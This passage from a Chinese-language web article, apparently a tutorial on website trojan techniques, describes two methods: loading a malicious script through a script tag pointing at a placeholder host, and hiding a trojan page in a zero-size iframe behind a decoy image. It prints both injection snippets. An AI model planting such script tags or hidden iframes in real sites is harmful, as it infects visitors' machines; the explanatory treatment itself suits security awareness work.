您现在的位置: 
2、js调用型网页挂马
js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。通常代码如下:
| <script language=javascript src=http://www.xxx.com/gm.js></script> |
http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了,如图2就是一个JS木马的代码。(图2)
3、图片伪装挂马
随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
| <html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="/Article/UploadFiles/200803/20080313161633178.jpg"></center> </html> |
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是/Article/UploadFiles/200803/20080313161633178.jpg,而http://www.xxx.com/test.htm网页代码也随之运行。(图3)
上一页 [1] [2] [3] [4] [5] [6] 下一页
